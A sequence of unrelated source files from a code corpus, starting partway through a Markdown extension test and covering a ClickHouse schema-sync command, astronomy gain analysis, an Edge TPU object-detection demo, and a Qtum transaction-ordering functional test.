Some +test+ and a [+link+](http://test.com)
"""
result = """<p>Some <strong>test</strong> and a <a href="http://test.com">+link+</a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
def test_ancestors_tail(self):
""" Test that an extension can exclude parent tags when dealing with a tail. """
test = """
[***+em+*+strong+**](http://test.com)
"""
result = """<p><a href="http://test.com"><strong><em>+em+</em>+strong+</strong></a></p>"""
self.md.reset()
self.assertEqual(self.md.convert(test), result)
|
the-stack_0_3781 | import re
from collections import defaultdict
from typing import Dict, Set
import structlog
from django.conf import settings
from django.core.management.base import BaseCommand
from ee.clickhouse.sql.schema import CREATE_TABLE_QUERIES, get_table_name
from posthog.client import sync_execute
logger = structlog.get_logger(__name__)
TableName = str
Query = str
HostName = str
class Command(BaseCommand):
help = "Synchronize schema across clickhouse cluster, creating missing tables on new nodes"
def add_arguments(self, parser):
parser.add_argument(
"--dry-run", action="store_true", help="Exits with a non-zero status if schema changes would be required."
)
def handle(self, *args, **options):
if not settings.CLICKHOUSE_REPLICATION or settings.MULTI_TENANCY:
logger.info("✅ Skipping non-replicated or cloud setup")
return
host_tables, create_table_queries, out_of_sync_hosts = self.analyze_cluster_tables()
if len(out_of_sync_hosts) > 0:
logger.info("Schema out of sync on some clickhouse nodes!", out_of_sync_hosts=out_of_sync_hosts)
if options.get("dry_run"):
exit(1)
else:
self.create_missing_tables(out_of_sync_hosts, create_table_queries)
logger.info("✅ All ClickHouse nodes schema in sync")
def analyze_cluster_tables(self):
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
rows = sync_execute(
"""
SELECT hostName() as host, name, create_table_query
FROM clusterAllReplicas(%(cluster)s, system, tables)
WHERE database = %(database)s
AND name IN %(table_names)s
""",
{
"cluster": settings.CLICKHOUSE_CLUSTER,
"database": settings.CLICKHOUSE_DATABASE,
"table_names": table_names,
},
)
host_tables: Dict[HostName, Set[TableName]] = defaultdict(set)
create_table_queries: Dict[TableName, Query] = {}
for host, table_name, create_table_query in rows:
host_tables[host].add(table_name)
create_table_queries[table_name] = create_table_query
return host_tables, create_table_queries, self.get_out_of_sync_hosts(host_tables)
def get_out_of_sync_hosts(self, host_tables: Dict[HostName, Set[TableName]]) -> Dict[HostName, Set[TableName]]:
table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))
out_of_sync = {}
for host, tables in host_tables.items():
missing_tables = set(table_names) - tables
if len(missing_tables) > 0:
out_of_sync[host] = missing_tables
return out_of_sync
def create_missing_tables(
self, out_of_sync_hosts: Dict[HostName, Set[TableName]], create_table_queries: Dict[TableName, Query]
):
missing_tables = set(table for tables in out_of_sync_hosts.values() for table in tables)
logger.info("Creating missing tables", missing_tables=missing_tables)
for table in missing_tables:
query = create_table_queries[table]
sync_execute(self.run_on_cluster(query))
def run_on_cluster(self, create_table_query: Query) -> Query:
return re.sub(
r"^CREATE TABLE (\S+)",
f"CREATE TABLE IF NOT EXISTS \\1 ON CLUSTER '{settings.CLICKHOUSE_CLUSTER}'",
create_table_query,
1,
)
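# For illustration (hypothetical table name "sharded_events"): run_on_cluster() rewrites
#   CREATE TABLE sharded_events (...) ENGINE = ReplicatedMergeTree(...)
# into
#   CREATE TABLE IF NOT EXISTS sharded_events ON CLUSTER '<CLICKHOUSE_CLUSTER>' (...) ENGINE = ReplicatedMergeTree(...)
# so each captured create_table_query can be replayed on hosts that are missing the table.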
|
the-stack_0_3782 | from os.path import join, dirname
import mock
import pytest
from .base import all_products, active_products
from .. import environment
from .. import products
test_paths = {"/": {"tests_path": join(dirname(__file__), "..", "..", "..", "..")}} # repo root
environment.do_delayed_imports(None, test_paths)
@active_products("product")
def test_load_active_product(product):
"""test we can successfully load the product of the current testenv"""
products.Product({}, product)
# test passes if it doesn't throw
@all_products("product")
def test_load_all_products(product):
"""test every product either loads or throws ImportError"""
try:
products.Product({}, product)
except ImportError:
pass
@active_products("product", marks={
"sauce": pytest.mark.skip("needs env extras kwargs"),
})
def test_server_start_config(product):
product_data = products.Product({}, product)
env_extras = product_data.get_env_extras()
with mock.patch.object(environment.serve, "start") as start:
with environment.TestEnvironment(test_paths,
1,
False,
False,
None,
product_data.env_options,
{"type": "none"},
env_extras):
start.assert_called_once()
args = start.call_args
config = args[0][1]
if "server_host" in product_data.env_options:
assert config["server_host"] == product_data.env_options["server_host"]
else:
assert config["server_host"] == config["browser_host"]
assert isinstance(config["bind_address"], bool)
|
the-stack_0_3783 | def valid_parentheses(string):
result=[char for char in string if char in "()"]
comp=-1
total=len(result)
if len(result)%2==1:
return False
index=0
while True:
if total==0:
return True
if index>=total-1:
index=0
total=len(result)
if comp==total:
return False
comp=total
if result[index+1]==")" and result[index]=="(":
del result[index:index+2]
total-=2
index+=1 |
the-stack_0_3786 | """Class to analyze the gains from fe55 cluster fitting"""
import numpy as np
from lsst.eotest.sensor import Fe55GainFitter
from lsst.eo_utils.base.defaults import ALL_SLOTS
from lsst.eo_utils.base.config_utils import EOUtilOptions
from lsst.eo_utils.base.data_utils import TableDict, vstack_tables
from lsst.eo_utils.base.factory import EO_TASK_FACTORY
from lsst.eo_utils.fe55.meta_analysis import Fe55RaftTableAnalysisConfig,\
Fe55RaftTableAnalysisTask,\
Fe55SummaryAnalysisConfig, Fe55SummaryAnalysisTask
class Fe55GainStatsConfig(Fe55RaftTableAnalysisConfig):
"""Configuration for Fe55GainStatsTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-clusters')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-stats')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainStatsTask(Fe55RaftTableAnalysisTask):
"""Analyze the gains using the fe55 cluster fit results"""
ConfigClass = Fe55GainStatsConfig
_DefaultName = "Fe55GainStatsTask"
plot_names = ['gain']
def extract(self, butler, data, **kwargs):
"""Extract the gains and widths from the f355 clusters
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
use_all = self.config.use_all
data_dict = dict(kalpha_peak=[],
kalpha_sigma=[],
ncluster=[],
ngood=[],
gain=[],
gain_error=[],
fit_xmin=[],
fit_xmax=[],
fit_pars=[],
fit_nbins=[],
sigmax_median=[],
sigmay_median=[],
slot=[],
amp=[])
self.log_info_raft_msg(self.config, "")
for islot, slot in enumerate(ALL_SLOTS):
self.log_progress(" %s" % slot)
basename = data[slot]
dtables = TableDict(basename)
for amp in range(16):
table = dtables['amp%02i' % (amp+1)]
if use_all:
mask = np.ones((len(table)), bool)
else:
mask = (np.fabs(table['XPOS'] - table['XPEAK']) < 1)*\
(np.fabs(table['YPOS'] - table['YPEAK']) < 1)
tablevals = table[mask]['DN']
gainfitter = Fe55GainFitter(tablevals)
try:
kalpha_peak, kalpha_sigma = gainfitter.fit(bins=100)
gain = gainfitter.gain
gain_error = gainfitter.gain_error
pars = gainfitter.pars
except Exception:
kalpha_peak, kalpha_sigma = (np.nan, np.nan)
gain = np.nan
gain_error = np.nan
pars = np.nan * np.ones((4))
data_dict['kalpha_peak'].append(kalpha_peak)
data_dict['kalpha_sigma'].append(kalpha_sigma)
data_dict['gain'].append(gain)
data_dict['gain_error'].append(gain_error)
xra = gainfitter.xrange
data_dict['ncluster'].append(mask.size)
data_dict['ngood'].append(mask.sum())
if xra is None:
data_dict['fit_xmin'].append(np.nan)
data_dict['fit_xmax'].append(np.nan)
else:
data_dict['fit_xmin'].append(xra[0])
data_dict['fit_xmax'].append(xra[1])
data_dict['fit_pars'].append(pars)
data_dict['fit_nbins'].append(100.)
data_dict['sigmax_median'].append(np.median(table['SIGMAX']))
data_dict['sigmay_median'].append(np.median(table['SIGMAY']))
data_dict['slot'].append(islot)
data_dict['amp'].append(amp)
self.log_progress("Done!")
outtables = TableDict()
outtables.make_datatable("fe55_gain_stats", data_dict)
return outtables
def plot(self, dtables, figs, **kwargs):
"""Plot the gain results from the fe55 study
It should use a `TableDict` object to create a set of
plots and fill a `FigureDict` object
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_stats']
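        # One raft's worth of values: 9 slots x 16 amps, as filled in extract() above.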
figs.plot_stat_color('gain', sumtable['gain'].reshape(9, 16))
class Fe55GainSummaryConfig(Fe55SummaryAnalysisConfig):
"""Configuration for Fe55GainSummaryTask"""
infilekey = EOUtilOptions.clone_param('infilekey', default='fe55-gain-stats')
filekey = EOUtilOptions.clone_param('filekey', default='fe55-gain-sum')
use_all = EOUtilOptions.clone_param('use_all')
class Fe55GainSummaryTask(Fe55SummaryAnalysisTask):
"""Sumarize the results of the Fe55 gain analyses"""
ConfigClass = Fe55GainSummaryConfig
_DefaultName = "Fe55GainSummaryTask"
plot_names = ['gain', 'sigmax', 'fgood']
def extract(self, butler, data, **kwargs):
"""Make a summry table of the fe55 data
Parameters
----------
butler : `Butler`
The data butler
data : `dict`
Dictionary (or other structure) contain the input data
kwargs
Used to override default configuration
Returns
-------
dtables : `TableDict`
The resulting data
"""
self.safe_update(**kwargs)
if butler is not None:
self.log.warn("Ignoring butler")
for key, val in data.items():
data[key] = val.replace('_fe55-gain-sum.fits', '_fe55-gain-stats.fits')
remove_cols = ['fit_pars']
if not self.config.skip:
outtable = vstack_tables(data, tablename='fe55_gain_stats',
remove_cols=remove_cols)
dtables = TableDict()
dtables.add_datatable('fe55_gain_sum', outtable)
dtables.make_datatable('runs', dict(runs=sorted(data.keys())))
return dtables
def plot(self, dtables, figs, **kwargs):
"""Plot the summary data from the fe55 study
Parameters
----------
dtables : `TableDict`
The data produced by this task
figs : `FigureDict`
The resulting figures
kwargs
Used to override default configuration
"""
self.safe_update(**kwargs)
sumtable = dtables['fe55_gain_sum']
runtable = dtables['runs']
yvals = sumtable['gain'].flatten().clip(0., 2.)
yerrs = sumtable['gain_error'].flatten().clip(0., 0.5)
runs = runtable['runs']
figs.plot_run_chart("gain", runs, yvals, yerrs=yerrs, ylabel="Gain")
yvals = sumtable['sigmax_median'].flatten().clip(0., 2.)
figs.plot_run_chart("sigmax", runs, yvals, ylabel="Cluster width [pixels]")
yvals = sumtable['ngood']/sumtable['ncluster']
figs.plot_run_chart("fgood", runs, yvals, ylabel="Fraction of good clusters")
EO_TASK_FACTORY.add_task_class('Fe55GainStats', Fe55GainStatsTask)
EO_TASK_FACTORY.add_task_class('Fe55GainSummary', Fe55GainSummaryTask)
|
the-stack_0_3787 | import os
import shutil
N = 6
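# Keep every N-th extracted frame (frames 1, 1+N, 1+2N, ...) from each of the 100 test videos.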
data_root = "/media/data/umutlu/AIC20_track4/"
original_image_folder = data_root + "test_ori_images/"
subset_folder = data_root + "subset_test_ori_images/"
for i in range(1, 101):
org_video_folder = original_image_folder + str(i) + "/"
subset_video_folder = subset_folder + str(i) + "/"
os.makedirs(subset_video_folder, exist_ok=True)
files = os.listdir(org_video_folder)
f = 1
while f < len(files):
shutil.copyfile(org_video_folder + str(f) + ".jpg", subset_video_folder + str(f) + ".jpg")
f += N
print("Video " + str(i) + " is done.")
|
the-stack_0_3788 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A demo which runs object detection on camera frames.
export TEST_DATA=/usr/lib/python3/dist-packages/edgetpu/test_data
Run face detection model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
Run coco model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--labels ${TEST_DATA}/coco_labels.txt
"""
import argparse
import collections
import colorsys
import itertools
import time
from pytz import utc,timezone
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
import datetime
import time
from edgetpu.detection.engine import DetectionEngine
from . import svg
from . import utils
from .apps import run_app
CSS_STYLES = str(svg.CssStyle({'.back': svg.Style(fill='black',
stroke='black',
stroke_width='0.5em'),
'.bbox': svg.Style(fill_opacity=0.0,
stroke_width='0.1em')}))
BBox = collections.namedtuple('BBox', ('x', 'y', 'w', 'h'))
BBox.area = lambda self: self.w * self.h
BBox.scale = lambda self, sx, sy: BBox(x=self.x * sx, y=self.y * sy,
w=self.w * sx, h=self.h * sy)
BBox.__str__ = lambda self: 'BBox(x=%.2f y=%.2f w=%.2f h=%.2f)' % self
Object = collections.namedtuple('Object', ('id', 'label', 'score', 'bbox'))
Object.__str__ = lambda self: 'Object(id=%d, label=%s, score=%.2f, %s)' % self
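# For example (illustrative numbers): BBox(x=0.1, y=0.2, w=0.5, h=0.25).scale(1280, 720)
# gives BBox(x=128.0, y=144.0, w=640.0, h=180.0), and the normalized box's area() is 0.125.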
#cred = credentials.Certificate('/usr/lib/python3/dist-packages/edgetpuvision/serviceAccount.json')
#firebase_admin.initialize_app(cred)
#db = firestore.client()
def size_em(length):
return '%sem' % str(0.6 * (length + 1))
def color(i, total):
return tuple(int(255.0 * c) for c in colorsys.hsv_to_rgb(i / total, 1.0, 1.0))
def make_palette(keys):
return {key : svg.rgb(color(i, len(keys))) for i, key in enumerate(keys)}
def make_get_color(color, labels):
if color:
return lambda obj_id: color
if labels:
palette = make_palette(labels.keys())
return lambda obj_id: palette[obj_id]
return lambda obj_id: 'white'
def overlay(title, objs, get_color, inference_time, inference_rate, layout):
x0, y0, width, height = layout.window
font_size = 0.03 * height
defs = svg.Defs()
defs += CSS_STYLES
doc = svg.Svg(width=width, height=height,
viewBox='%s %s %s %s' % layout.window,
font_size=font_size, font_family='monospace', font_weight=500)
doc += defs
for obj in objs:
percent = int(100 * obj.score)
if obj.label:
caption = '%d%% %s' % (percent, obj.label)
else:
caption = '%d%%' % percent
x, y, w, h = obj.bbox.scale(*layout.size)
color = get_color(obj.id)
doc += svg.Rect(x=x, y=y, width=w, height=h,
style='stroke:%s' % color, _class='bbox')
doc += svg.Rect(x=x, y=y+h ,
width=size_em(len(caption)), height='1.2em', fill=color)
t = svg.Text(x=x, y=y+h, fill='black')
t += svg.TSpan(caption, dy='1em')
doc += t
ox = x0 + 20
oy1, oy2 = y0 + 20 + font_size, y0 + height - 20
# Title
if title:
doc += svg.Rect(x=0, y=0, width=size_em(len(title)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, oy1), _class='back')
doc += svg.Text(title, x=ox, y=oy1, fill='white')
# Info
lines = [
'Objects: %d' % len(objs),
'Inference time: %.2f ms (%.2f fps)' % (inference_time * 1000, 1.0 / inference_time)
]
for i, line in enumerate(reversed(lines)):
y = oy2 - i * 1.7 * font_size
doc += svg.Rect(x=0, y=0, width=size_em(len(line)), height='1em',
transform='translate(%s, %s) scale(1,-1)' % (ox, y), _class='back')
doc += svg.Text(line, x=ox, y=y, fill='white')
return str(doc)
def convert(obj, labels):
x0, y0, x1, y1 = obj.bounding_box.flatten().tolist()
return Object(id=obj.label_id,
label=labels[obj.label_id] if labels else None,
score=obj.score,
bbox=BBox(x=x0, y=y0, w=x1 - x0, h=y1 - y0))
def print_results(inference_rate, objs):
print('\nInference (rate=%.2f fps):' % inference_rate)
for i, obj in enumerate(objs):
print(' %d: %s, area=%.2f' % (i, obj, obj.bbox.area()))
def render_gen(args):
fps_counter = utils.avg_fps_counter(30)
engines, titles = utils.make_engines(args.model, DetectionEngine)
assert utils.same_input_image_sizes(engines)
engines = itertools.cycle(engines)
engine = next(engines)
labels = utils.load_labels(args.labels) if args.labels else None
filtered_labels = set(l.strip() for l in args.filter.split(',')) if args.filter else None
get_color = make_get_color(args.color, labels)
draw_overlay = True
yield utils.input_image_size(engine)
output = None
while True:
tensor, layout, command = (yield output)
inference_rate = next(fps_counter)
if draw_overlay:
start = time.monotonic()
            objs = engine.detect_with_input_tensor(tensor, threshold=args.threshold, top_k=args.top_k)
inference_time = time.monotonic() - start
objs = [convert(obj, labels) for obj in objs]
#objx,objy = [convert_xy(obj) for obj in objs]
if labels and filtered_labels:
objs = [obj for obj in objs if obj.label in filtered_labels]
objs = [obj for obj in objs if args.min_area <= obj.bbox.area() <= args.max_area]
if args.print:
print_results(inference_rate, objs)
#if objs:
# string = ""
# string_id = ""
# for i in range(len(objs)):
# socre = objs[i][2]
# if socre > 0.5:
# objid = objs[i][0]
# objx = objs[i][3][0]
# objy = objs[i][3][1]
# objw = objs[i][3][2]
# objh = objs[i][3][3]
# x = ((objx+objx+objw)/2)*1280
# y = ((objy+objy+objh)/2)*720
# if i == (len(objs)-1):
# string = string+(str(round(x,3))+","+str(round(y,3)))
# string_id = string_id+(str(objid)+" ")
# else:
# string = string+(str(round(x,3))+","+str(round(y,3))+" ")
# string_id = string_id+(str(objid)+" ")
# if string:
# now = datetime.datetime.now()
# thistime = now.strftime('%H%M%S%f')[:-3]
# print(now.strftime('%H%M%S%f')[:-3])
# print(string)
# print(string_id)
# doc = {
# 'label':string_id,
# 'positsion':string,
# 'timeid':thistime
# }
# doc_ref = db.collection("time").document(thistime)
# doc_ref.set(doc)
title = titles[engine]
output = overlay(title, objs, get_color, inference_time, inference_rate, layout)
else:
output = None
if command == 'o':
draw_overlay = not draw_overlay
elif command == 'n':
engine = next(engines)
def add_render_gen_args(parser):
parser.add_argument('--model',
help='.tflite model path', required=True)
parser.add_argument('--labels',
help='labels file path')
parser.add_argument('--top_k', type=int, default=50,
help='Max number of objects to detect')
parser.add_argument('--threshold', type=float, default=0.1,
help='Detection threshold')
parser.add_argument('--min_area', type=float, default=0.0,
help='Min bounding box area')
parser.add_argument('--max_area', type=float, default=1.0,
help='Max bounding box area')
parser.add_argument('--filter', default=None,
help='Comma-separated list of allowed labels')
parser.add_argument('--color', default=None,
help='Bounding box display color'),
parser.add_argument('--print', default=False, action='store_true',
help='Print inference results')
def main():
run_app(add_render_gen_args, render_gen)
if __name__ == '__main__':
main()
|
the-stack_0_3790 | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
from test_framework.qtum import *
import sys
import random
import time
class QtumTransactionPrioritizationTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.is_network_split = False
self.node = self.nodes[0]
def restart_node(self):
stop_nodes(self.nodes)
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, [['-staking=1', '-rpcmaxgasprice=10000000']])
self.node = self.nodes[0]
def stake_or_mine(self, old_block_count=None, use_staking=False):
# Since staking is switched on by default, if a block has been staked return that block's hash
if self.node.getblockcount() > old_block_count:
return self.node.getbestblockhash()
if use_staking:
if not old_block_count:
old_block_count = self.node.getblockcount()
while old_block_count == self.node.getblockcount():
time.sleep(0.1)
return self.node.getbestblockhash()
else:
return self.node.generate(1)[0]
def send_transaction_with_fee(self, fee):
for unspent in self.node.listunspent():
if unspent['amount'] >= 10000:
break
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
amount = int((float(str(unspent['amount'])) - fee)*COIN)
tx.vout = [CTxOut(amount, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG]))]
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
# Creates and op_call tx that calls the fallback function of the only contract that should be in existance
def send_op_call_transaction_with_gas_price(self, contract_address, gas_price, spends_txid=None, spends_vout=None):
gas_limit = 1000000
if not spends_txid:
unspent = self.node.listunspent()[0]
spends_txid = unspent['txid']
spends_vout = unspent['vout']
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
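        # OP_CALL script layout: VM version (0x04 = EVM), gas limit, gas price (in satoshis),
        # call data (0x00 here, which just hits the fallback), contract address, OP_CALL.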
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - gas_price*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def send_op_call_outputs_with_gas_price(self, contract_address, gas_prices, spends_txid=None, spends_vout=None):
gas_limit = 100000
if not spends_txid:
for unspent in self.node.listunspent():
if unspent['amount'] == 20000:
spends_txid = unspent['txid']
spends_vout = unspent['vout']
break
# Fetch the amount of the vout of the txid that we are spending
spends_tx = self.node.getrawtransaction(spends_txid, True)
for output in spends_tx['vout']:
if output['n'] == spends_vout:
break
else:
# That output does not exist...
assert(False)
addr = self.node.getnewaddress()
haddr = p2pkh_to_hex_hash(addr)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(spends_txid, 16), spends_vout), nSequence=0)]
for gas_price in gas_prices:
tx.vout.append(CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(gas_limit), CScriptNum(int(gas_price*COIN)), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])))
change = int((float(str(output['value'])) - sum(gas_prices)*gas_limit) * COIN)
tx.vout.append(CTxOut(change, scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(haddr), OP_EQUALVERIFY, OP_CHECKSIG])))
tx_hex_signed = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
return self.node.sendrawtransaction(tx_hex_signed)
def verify_contract_txs_are_added_last_test(self, with_restart=False, use_staking=False):
# Set the fee really high so that it should normally be added first if we only looked at the fee/size
contract_txid = self.node.createcontract("00", 4*10**6, 0.0001)['txid']
normal_txid = self.node.sendtoaddress(self.node.getnewaddress(), 1)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 3)
assert_equal(block_txs.index(normal_txid), 1)
assert_equal(block_txs.index(contract_txid), 2)
# Verifies that contract transactions are correctly ordered by descending (minimum among outputs) gas price and ascending size
# Sends 7 txs in total
def verify_contract_txs_internal_order_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
sender = self.node.getnewaddress()
tx4 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001])
tx5 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.0001])
tx3 = self.send_op_call_outputs_with_gas_price(contract_address, [0.00010001])
tx6 = self.send_op_call_outputs_with_gas_price(contract_address, [0.0001, 0.00010001, 0.00010001])
tx2 = self.send_op_call_outputs_with_gas_price(contract_address, [0.002])
tx1 = self.node.sendtoaddress(sender, 1)
tx7 = self.node.sendtocontract(contract_address, "00", 0, 100000, "0.000001", sender)['txid']
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
        # Ordering should now be tx1 (normal tx first), then the contract txs by descending
        # minimum gas price with ties broken by ascending size: tx2 through tx7.
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block = self.node.getblock(block_hash)
block_txs = block['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(block_txs[1:], [tx1, tx2, tx3, tx4, tx5, tx6, tx7])
# In the case of an ancestor chain in the mempool such that a contract tx spends another normal tx that is in the mempool
# the contract tx should still be added last while the tx it spends should be added based on it's fee ordering.
# In this test we create 4 txs.
# 1. a normal tx has a fee > tx2 and tx3
    # 2. an ancestor normal tx that will be spent by the contract tx, with a fee < tx1 and > tx3
    # 3. a normal tx with a fee < tx1 and tx2
    # 4. an op call contract tx spending tx2.
# Expected transaction ordering in the block should thus be tx1, tx2, tx3, tx4
def verify_ancestor_chain_with_contract_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
tx1 = self.send_transaction_with_fee(0.01)
tx2 = self.send_transaction_with_fee(0.005)
tx3 = self.send_transaction_with_fee(0.001)
# Create a contract tx (4) that spends tx3
tx4 = self.send_op_call_transaction_with_gas_price(contract_address, 0.001, spends_txid=tx2, spends_vout=0)
# Make sure that all txs are in the mempool
assert_equal(len(self.node.getrawmempool()), 4)
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
assert_equal(len(block_txs), 5)
assert_equal(block_txs[1], tx1)
assert_equal(block_txs[2], tx2)
assert_equal(block_txs[3], tx3)
assert_equal(block_txs[4], tx4)
# Creates two different contract tx chains.
def verify_contract_ancestor_txs_test(self, with_restart=False, use_staking=False):
contract_address = list(self.node.listcontracts().keys())[0]
for unspent in self.node.listunspent():
if unspent['amount'] > 10000:
break
address = self.node.getnewaddress()
expected_tx_order = []
for (expected_tx_index, gas_price) in [(1, 60), (2, 50), (7, 40), (8, 50)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
for unspent in self.node.listunspent():
if unspent['amount'] == 20000 and unspent['address'] != address:
break
# The list of tuples specifies (expected position in block txs, gas_price)
for (expected_tx_index, gas_price) in [(3, 49), (4, 48), (5, 47), (6, 46)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
        # Even though the gas prices differ, the ancestor txs must be included before their child txs, so we expect the order in which they were sent,
        # always choosing the tx with the highest gas price whose ancestors have already been included.
for (expected_tx_index, txid) in expected_tx_order:
assert_equal(block_txs[expected_tx_index], txid)
def run_test(self):
self.node.generate(500+COINBASE_MATURITY)
print("running pow tests")
self.verify_contract_txs_are_added_last_test()
self.verify_ancestor_chain_with_contract_txs_test()
self.verify_contract_txs_internal_order_test()
self.verify_contract_ancestor_txs_test()
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
# Redo the testing and check that the mempool is correctly ordered after a restart
print("running pow tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True)
self.verify_contract_txs_internal_order_test(with_restart=True)
self.verify_contract_ancestor_txs_test(with_restart=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests")
self.verify_contract_txs_are_added_last_test(use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(use_staking=True)
self.verify_contract_txs_internal_order_test(use_staking=True)
self.verify_contract_ancestor_txs_test(use_staking=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True, use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True, use_staking=True)
